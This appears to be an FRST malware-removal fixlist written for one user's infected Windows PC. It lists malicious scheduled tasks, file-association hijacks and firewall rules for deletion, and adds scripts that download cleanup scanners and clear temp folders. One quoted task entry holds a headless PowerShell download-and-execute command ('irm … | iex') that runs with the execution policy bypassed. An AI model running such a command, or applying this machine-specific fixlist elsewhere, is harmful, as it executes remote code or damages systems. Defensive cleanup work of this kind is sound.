content copied
content
Start
CreateRestorePoint:
CloseProcesses:
Task: {69B9514A-88DE-49A0-91FE-440F6F03CF67} - System32\Tasks\App Explorer => C:\Users\rudhr\AppData\Local\Host App Service\Engine\HostAppServiceUpdater.exe [9793520 2025-06-30] (SweetLabs Inc -> SweetLabs, Inc) <==== ATTENTION
C:\Users\rudhr\AppData\Local\Host App Service
Task: {0F6AA10E-D3B4-4E26-9684-1F3FB88047A9} - System32\Tasks\InteractiveServices\MicrosoftCertificateServicesPKIClientCmdletsResourcesTask.CL-NCLS-1-5-21-1832201896-1578702492-506240896-1001 => C:\Windows\System32\conhost.exe [1011712 2026-05-13] (Microsoft Windows -> Microsoft Corporation) -> --headless powershell -NoProfile -ExecutionPolicy Bypass -Command "irm 135.11885558/a | iex" <==== ATTENTION
2026-06-10 07:22 - 2026-06-10 07:47 - 000000000 ____D C:\WINDOWS\system32\Tasks\InteractiveServices
2026-06-10 07:24 - 2026-06-10 07:24 - 000000000 ____D C:\Users\rudhr\AppData\Local\rhdur
2026-06-10 07:23 - 2026-06-10 07:23 - 000000000 ____D C:\Users\rudhr\AppData\Local\Yandex
2026-06-10 07:19 - 2025-10-09 23:31 - 000000000 ____D C:\Users\rudhr\AppData\Roaming\RenPy
AlternateDataStreams: C:\WINDOWS\tracing:? [16]
FirewallRules: [UDP Query User{EE4E3FF0-B13A-4ECB-B717-C1BC2076EE5D}C:\games\buckshot.roulette.v2.2.0a\buckshot.roulette.v2.2.0a\buckshot.roulette.v2.2.0a\buckshot roulette.exe] => (Allow) C:\games\buckshot.roulette.v2.2.0a\buckshot.roulette.v2.2.0a\buckshot.roulette.v2.2.0a\buckshot roulette.exe => No File
FirewallRules: [TCP Query User{CC5787EB-8856-41E4-A8D0-067CA99D1E95}C:\games\buckshot.roulette.v2.2.0a\buckshot.roulette.v2.2.0a\buckshot.roulette.v2.2.0a\buckshot roulette.exe] => (Allow) C:\games\buckshot.roulette.v2.2.0a\buckshot.roulette.v2.2.0a\buckshot.roulette.v2.2.0a\buckshot roulette.exe => No File
FirewallRules: [{035F4BFC-F945-44AF-8FD8-E20E935797D1}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe => No File
FirewallRules: [{B0DBD9A5-89AB-432C-AE14-9E076904DAC7}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe => No File
FirewallRules: [TCP Query User{B5F15CA8-464A-4F5D-A9DD-CFC5C162D48F}C:\users\rudhr\downloads\scrcpy-win64-v3.3.1\scrcpy-win64-v3.3.1\adb.exe] => (Allow) C:\users\rudhr\downloads\scrcpy-win64-v3.3.1\scrcpy-win64-v3.3.1\adb.exe => No File
FirewallRules: [UDP Query User{F0C1D244-3899-4C64-8825-465EDA3CFEAC}C:\users\rudhr\downloads\scrcpy-win64-v3.3.1\scrcpy-win64-v3.3.1\adb.exe] => (Allow) C:\users\rudhr\downloads\scrcpy-win64-v3.3.1\scrcpy-win64-v3.3.1\adb.exe => No File
FirewallRules: [TCP Query User{1AEEFEFF-95E8-45A2-987B-693526C66D54}C:\games\lies of p\liesofp\binaries\win64\lop-win64-shipping.exe] => (Allow) C:\games\lies of p\liesofp\binaries\win64\lop-win64-shipping.exe => No File
FirewallRules: [UDP Query User{BF3171FB-2772-4429-8798-F96F6238EA56}C:\games\lies of p\liesofp\binaries\win64\lop-win64-shipping.exe] => (Allow) C:\games\lies of p\liesofp\binaries\win64\lop-win64-shipping.exe => No File
FirewallRules: [{C3F6BD26-4914-4181-81D1-137F36A17A28}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\ELDEN RING\Game\start_protected_game.exe => No File
FirewallRules: [{8E454167-9A00-4CAE-903F-64E9EA2BDEEB}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\ELDEN RING\Game\start_protected_game.exe => No File
FirewallRules: [TCP Query User{C5D22348-A750-49EC-86D6-D0AB97B5384F}C:\games\wagotabi\game\wagotabi.exe] => (Allow) C:\games\wagotabi\game\wagotabi.exe => No File
FirewallRules: [UDP Query User{FC3086F6-8EBA-42B3-92C6-59D70201E3D1}C:\games\wagotabi\game\wagotabi.exe] => (Allow) C:\games\wagotabi\game\wagotabi.exe => No File
FirewallRules: [TCP Query User{9C3B2C77-D3ED-4FB9-804A-FDE23BC88645}C:\riot games\2xko\live\lion\binaries\win64\lion-win64-shipping.exe] => (Allow) C:\riot games\2xko\live\lion\binaries\win64\lion-win64-shipping.exe => No File
FirewallRules: [UDP Query User{5EBB0F6C-83C3-4BBD-AA41-05CB5BE59707}C:\riot games\2xko\live\lion\binaries\win64\lion-win64-shipping.exe] => (Allow) C:\riot games\2xko\live\lion\binaries\win64\lion-win64-shipping.exe => No File
FirewallRules: [TCP Query User{CB5EBB3F-5BC1-4A1E-9FCB-0EE15FA7B83A}C:\games\sekiro shadows die twice\sekiro.exe] => (Allow) C:\games\sekiro shadows die twice\sekiro.exe => No File
FirewallRules: [UDP Query User{8007493F-8EC6-4E0B-A0F9-A700EF12B787}C:\games\sekiro shadows die twice\sekiro.exe] => (Allow) C:\games\sekiro shadows die twice\sekiro.exe => No File
FirewallRules: [{0A62178C-35F4-4ECE-9DD7-898A35D069F7}] => (Allow) C:\WINDOWS\System32\DriverStore\FileRepository\predatorservice.inf_amd64_ec38587b71ef8108\OpenRGB.exe => No File
FirewallRules: [{9F08854A-0A99-41D0-9142-24E44BAA4923}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\DOOMEternal\launcher\idTechLauncher.exe => No File
FirewallRules: [{3AE7A2C5-56DB-4FB5-B553-F42AB192226E}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\DOOMEternal\launcher\idTechLauncher.exe => No File
FirewallRules: [TCP Query User{F48329CB-F624-41D0-9CB6-C16252721EB7}C:\program files\windowsapps\43692cyanfood.airserver-screenmirroringandfileshar_1.0.8.0_x64__68m3xzxrwb0hp\runtime\bin\java.exe] => (Allow) C:\program files\windowsapps\43692cyanfood.airserver-screenmirroringandfileshar_1.0.8.0_x64__68m3xzxrwb0hp\runtime\bin\java.exe => No File
FirewallRules: [UDP Query User{852C7ED0-5C7B-4AF4-A3A7-A684A6F7D1F6}C:\program files\windowsapps\43692cyanfood.airserver-screenmirroringandfileshar_1.0.8.0_x64__68m3xzxrwb0hp\runtime\bin\java.exe] => (Allow) C:\program files\windowsapps\43692cyanfood.airserver-screenmirroringandfileshar_1.0.8.0_x64__68m3xzxrwb0hp\runtime\bin\java.exe => No File
FirewallRules: [TCP Query User{2C07CE86-EE02-4C2E-8B87-02D370712E91}C:\games\ultrakill\ultrakill.exe] => (Allow) C:\games\ultrakill\ultrakill.exe => No File
FirewallRules: [UDP Query User{7B4D5E2B-99EB-4B95-8F22-754C5BE2794F}C:\games\ultrakill\ultrakill.exe] => (Allow) C:\games\ultrakill\ultrakill.exe => No File
FirewallRules: [TCP Query User{99473623-FE0F-457A-BCEA-86B50596C833}C:\program files (x86)\steam\steamapps\common\skate\skate.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\skate\skate.exe => No File
FirewallRules: [UDP Query User{91A3C617-FB0D-4723-AE40-BC224877C4C6}C:\program files (x86)\steam\steamapps\common\skate\skate.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\skate\skate.exe => No File
FirewallRules: [TCP Query User{90241BEB-AB45-41A3-B749-8F704C57DE12}C:\games\trepang2\cppfps\binaries\win64\cppfps-win64-shipping.exe] => (Allow) C:\games\trepang2\cppfps\binaries\win64\cppfps-win64-shipping.exe => No File
FirewallRules: [UDP Query User{BF255CA4-0E67-476E-BAEE-B9D18E6BFCD1}C:\games\trepang2\cppfps\binaries\win64\cppfps-win64-shipping.exe] => (Allow) C:\games\trepang2\cppfps\binaries\win64\cppfps-win64-shipping.exe => No File
FirewallRules: [TCP Query User{01817DF2-BC9B-4B5D-9A03-8FCDE166E4E0}C:\games\yakuza 0\media\yakuza0.exe] => (Allow) C:\games\yakuza 0\media\yakuza0.exe => No File
FirewallRules: [UDP Query User{38A6F331-1696-43C9-997E-4A17750C6086}C:\games\yakuza 0\media\yakuza0.exe] => (Allow) C:\games\yakuza 0\media\yakuza0.exe => No File
FirewallRules: [TCP Query User{28E08063-AD3E-4F0E-84C4-61556507FE90}C:\games\black.souls\black.souls\game\game.exe] => (Allow) C:\games\black.souls\black.souls\game\game.exe => No File
FirewallRules: [UDP Query User{5C8D2389-4578-45C8-B74D-CFC6F22F4993}C:\games\black.souls\black.souls\game\game.exe] => (Allow) C:\games\black.souls\black.souls\game\game.exe => No File
FirewallRules: [TCP Query User{493AF6D0-5975-47DB-8003-319854634FF8}C:\users\rudhr\appdata\local\medal\app-4.3087.0\medal.exe] => (Allow) C:\users\rudhr\appdata\local\medal\app-4.3087.0\medal.exe => No File
FirewallRules: [UDP Query User{00EC93FD-CB38-4B01-AE8E-B0E53A40ABF9}C:\users\rudhr\appdata\local\medal\app-4.3087.0\medal.exe] => (Allow) C:\users\rudhr\appdata\local\medal\app-4.3087.0\medal.exe => No File
FirewallRules: [TCP Query User{D8E8D088-A3FF-4698-B36E-9B18AB438B23}C:\games\nier replicant ver.1.22474487139\nier replicant ver.1.22474487139.exe] => (Allow) C:\games\nier replicant ver.1.22474487139\nier replicant ver.1.22474487139.exe => No File
FirewallRules: [UDP Query User{4F6D5D54-2379-4320-82D2-3B39E80B8DC0}C:\games\nier replicant ver.1.22474487139\nier replicant ver.1.22474487139.exe] => (Allow) C:\games\nier replicant ver.1.22474487139\nier replicant ver.1.22474487139.exe => No File
FirewallRules: [TCP Query User{628777FD-0C23-4E70-8107-3CBAC240DD7A}C:\users\rudhr\downloads\pcfa emulator\pcfa\emulator\rpcs3.exe] => (Allow) C:\users\rudhr\downloads\pcfa emulator\pcfa\emulator\rpcs3.exe => No File
FirewallRules: [UDP Query User{6AAEA890-F15A-4382-B855-6D3C87D999EB}C:\users\rudhr\downloads\pcfa emulator\pcfa\emulator\rpcs3.exe] => (Allow) C:\users\rudhr\downloads\pcfa emulator\pcfa\emulator\rpcs3.exe => No File
FirewallRules: [TCP Query User{C3349E69-5651-4F5F-A666-5AB5E585CA16}C:\games\spaceengine\system\spaceengine.exe] => (Allow) C:\games\spaceengine\system\spaceengine.exe => No File
FirewallRules: [UDP Query User{30803813-ADFB-449B-89EA-4D10231BAACA}C:\games\spaceengine\system\spaceengine.exe] => (Allow) C:\games\spaceengine\system\spaceengine.exe => No File
FirewallRules: [TCP Query User{B7C8F992-B78B-41D5-BDB8-ABC6AB178ADD}C:\games\spaceengine\system\launchpad.exe] => (Allow) C:\games\spaceengine\system\launchpad.exe => No File
FirewallRules: [UDP Query User{CECFC800-BA07-404F-87F6-45DEC6538650}C:\games\spaceengine\system\launchpad.exe] => (Allow) C:\games\spaceengine\system\launchpad.exe => No File
FirewallRules: [TCP Query User{1822FB96-D3CE-444A-AA3E-19685EA5D72D}C:\games\cyberpunk 2077\bin\x64\cyberpunk2077.exe] => (Allow) C:\games\cyberpunk 2077\bin\x64\cyberpunk2077.exe => No File
FirewallRules: [UDP Query User{84B9C961-503E-4B7C-A979-09CEAC57B065}C:\games\cyberpunk 2077\bin\x64\cyberpunk2077.exe] => (Allow) C:\games\cyberpunk 2077\bin\x64\cyberpunk2077.exe => No File
FirewallRules: [TCP Query User{92EDCCAC-2A21-4754-A98F-6CCCFF33E4A4}C:\program files (x86)\steam\steamapps\common\paladins\binaries\win64\paladins.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\paladins\binaries\win64\paladins.exe => No File
FirewallRules: [UDP Query User{F01D7782-A902-4753-895B-9CBB3CEBFD46}C:\program files (x86)\steam\steamapps\common\paladins\binaries\win64\paladins.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\paladins\binaries\win64\paladins.exe => No File
FirewallRules: [TCP Query User{CDECA845-D05B-442D-97FA-E028126FDCBF}C:\program files (x86)\steam\steamapps\common\wallpaper_engine\bin\ui32.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\wallpaper_engine\bin\ui32.exe => No File
FirewallRules: [UDP Query User{A72734D4-A805-4855-9160-A427AF0A3206}C:\program files (x86)\steam\steamapps\common\wallpaper_engine\bin\ui32.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\wallpaper_engine\bin\ui32.exe => No File
FirewallRules: [TCP Query User{53516243-FB74-4D36-B423-2DA062040340}C:\users\rudhr\downloads\rush proto v0.1.1\rush\rush.exe] => (Allow) C:\users\rudhr\downloads\rush proto v0.1.1\rush\rush.exe => No File
FirewallRules: [UDP Query User{568ED5F0-3216-4954-9719-123264707889}C:\users\rudhr\downloads\rush proto v0.1.1\rush\rush.exe] => (Allow) C:\users\rudhr\downloads\rush proto v0.1.1\rush\rush.exe => No File
FirewallRules: [{C4B7654E-1657-49E9-95AC-C5DBAD0078A0}] => (Allow) C:\Program Files\Razer\RazerAppEngine\app-4.0.662\RazerAppEngine.exe => No File
Task: {077BA067-7C15-40F0-B22E-C9DC2A54B4A2} - System32\Tasks\Microsoft\Windows\Location\Notifications => %windir%\System32\LocationNotificationWindows.exe (No File)
Task: {0BB36A32-0D9E-4297-AFD7-6BD7B5DB4C9B} - System32\Tasks\Microsoft\Windows\UNP\RunUpdateNotificationMgr => %windir%\System32\UNP\UpdateNotificationMgr.exe (No File)
Task: {F3E6E7ED-A196-4E44-8803-55FAB3AD4E29} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker => %systemroot%\system32\MusNotification.exe (No File)
S3 EAAntiCheat; system32\drivers\eaanticheat.sys (No File)
S4 NvModuleTracker; \SystemRoot\System32\DriverStore\FileRepository\nvmoduletracker.inf_amd64_ea6cec41fc5b2a8b\NvModuleTracker.sys (No File)
S3 PredatorService; \SystemRoot\System32\DriverStore\FileRepository\predatorservice.inf_amd64_ec38587b71ef8108\PredatorServiceSoftwareComponent.sys (No File)
2025-11-22 14:33 - 2025-11-22 14:33 - 000000048 ____R () C:\Users\rudhr\AppData\Local\C1CC5A19E18DB62B3DDA089551FC3FBB
HKU\S-1-5-21-1832201896-1578702492-506240896-1001\Software\Classes\regfile: <==== ATTENTION
HKU\S-1-5-21-1832201896-1578702492-506240896-1001\Software\Classes\.reg: => <==== ATTENTION
HKU\S-1-5-21-1832201896-1578702492-506240896-1001\Software\Classes\.bat: => <==== ATTENTION
HKU\S-1-5-21-1832201896-1578702492-506240896-1001\Software\Classes\.cmd: => <==== ATTENTION
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
File: C:\Program Files\Npcap\CheckStatus.bat
CMD: type "C:\Program Files\Npcap\CheckStatus.bat"
Folder: C:\Users\rudhr\Downloads\Elin.7z_Archive_free_3799
Folder: C:\Users\rudhr\AppData\Local\Creative
Powershell: Get-ScheduledTask | select -first 30 | Get-ScheduledTaskInfo
Powershell: @("$env:APPDATA","$env:LOCALAPPDATA") | ForEach-Object { Get-ChildItem $_ -Recurse -Filter "index.js" -ErrorAction SilentlyContinue } | Where-Object { $_.FullName -match "discord_desktop_core" } | ForEach-Object { Write-Host "--- $($_.FullName) ---"; (Get-Content $_.FullName -Raw).Substring(0,[Math]::Min(2000,(Get-Content $_.FullName -Raw).Length)) }
Powershell: (Get-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -ErrorAction SilentlyContinue).PSObject.Properties | Where-Object { $_.Name -match "^[a-z]$" } | ForEach-Object { Write-Host "$($_.Name): $($_.Value)" }
C:\WINDOWS\Temp\*
C:\WINDOWS\SystemTemp\*
C:\Users\rudhr\AppData\Local\Temp\*
StartPowerShell:
# Downloads newest AdwCleaner version directly from Malwarebytes, performs an update, scans, cleans and writes the log in console
# Does not clean preinstalled objects, only PUP/Adware
# If you would like to delete preinstalled objects, add an argument /preinstalled to the /clean argument
# If you would like to only scan with it, change the argument from /clean to /scan
New-Item -ItemType Directory -Force -Path "$env:SystemDrive\AdwCleaner" | Out-Null
Invoke-WebRequest -Uri "https://adwcleaner.malwarebytes.com/adwcleaner?channel=release" -OutFile "$env:SystemDrive\AdwCleaner\AdwCleanerFRST.exe"
Start-Process -FilePath "$env:SystemDrive\AdwCleaner\AdwCleanerFRST.exe" -ArgumentList "/eula" -Wait -WindowStyle Hidden
$logFile = "$env:SystemDrive\AdwCleaner\AdwCleanerOutputFRST.txt"
Start-Process -FilePath "$env:SystemDrive\AdwCleaner\AdwCleanerFRST.exe" -ArgumentList "/noreboot /clean" -Wait -WindowStyle Hidden -RedirectStandardOutput $logFile
Get-Content $logFile -Encoding Unicode
Remove-Item -Path $logFile -Force -ErrorAction SilentlyContinue
EndPowerShell:
StartPowershell:
# Replace /scanonly with /clean if you also want to delete items -- however, this will activate a trial license on the system, I do not recommend it
$hmpExe = "$env:TEMP\HitmanPro_x64.exe"
$logFile = "$env:TEMP\HitmanPro_ScanLog.txt"
Invoke-WebRequest -Uri "https://dl.surfright.nl/HitmanPro_x64.exe" -OutFile $hmpExe -UseBasicParsing
$proc = Start-Process $hmpExe -ArgumentList "/ews","/scanonly","/noinstall","/log=`"$logFile`"","/logtype=txt" -Wait -PassThru
if (!(Test-Path $logFile)) { Write-Host "Scan failed (exit $($proc.ExitCode))"; exit 1 }
Get-Content $logFile -Encoding Unicode
EndPowershell:
StartPowerShell:
# This snippet downloads Emsisoft Emergency Kit (EEK) from the Emsisoft's official site, updates it, scans with it.
# Do note that the executable is 300MB and may take some time to download.
# ---
# This will scan for malware and PUP's in 1) system memory 2) important folders as documentation says
# It will scan in compressed archives, in mail archives, in NTFS alternate data streams and use cloud requests
# ---
# You can use argument "/delete" to delete found objects including references but this is permanent and irreversible.
# You can remove the "/quick" argument to do a full scan but that may take longer than what FRST can handle.
# You can use argument "/quarantine="[folder]"" to put found malware into quarantine, but I personally prefer first verifying the detections.
$downloadUrl = "https://dl.emsisoft.com/EmsisoftEmergencyKit.exe"
$systemDrive = $env:SystemDrive
$frstPath = "$systemDrive\FRST"
$savePath = "$frstPath\EEK.exe"
$extractPath = "$frstPath\EEK"
if (-not (Test-Path $frstPath)) {
New-Item -Path $frstPath -ItemType Directory -Force | Out-Null
}
if (-not (Test-Path $extractPath)) {
New-Item -Path $extractPath -ItemType Directory -Force | Out-Null
}
Invoke-WebRequest -Uri $downloadUrl -OutFile $savePath -UseBasicParsing
$proc = Start-Process -FilePath $savePath -ArgumentList "-s -d`"$extractPath`"" -PassThru
while (-not (Test-Path "$extractPath\bin64\a2cmd.exe")) { Start-Sleep -Milliseconds 1000 }
Stop-Process -Id $proc.Id -Force -ErrorAction SilentlyContinue
if ([Environment]::Is64BitOperatingSystem) {
$a2cmdPath = Join-Path $extractPath "bin64\a2cmd.exe"
} else {
$a2cmdPath = Join-Path $extractPath "bin32\a2cmd.exe"
}
Start-Process -FilePath $a2cmdPath -ArgumentList "/update" -Wait -NoNewWindow
Start-Process -FilePath $a2cmdPath -ArgumentList "/malware /quick /m /t /pup /a /am /cloud=1 /la=`"$frstPath\EEK_scan.log`"" -Wait -NoNewWindow
Get-Content "$frstPath\EEK_scan.log"
exit
EndPowerShell:
cmd: del %temp%\*.* /f /s /q
cmd: rd /s /q %temp%
cmd: bitsadmin /reset /allusers
cmd: netsh winsock reset catalog
cmd: ipconfig /flushdns
RemoveProxy:
EmptyTemp:
End
Warning
Executing a Fixlist on the wrong system may permanently damage it. Continue only if this link was meant for you.
To view the content, acknowledge this warning.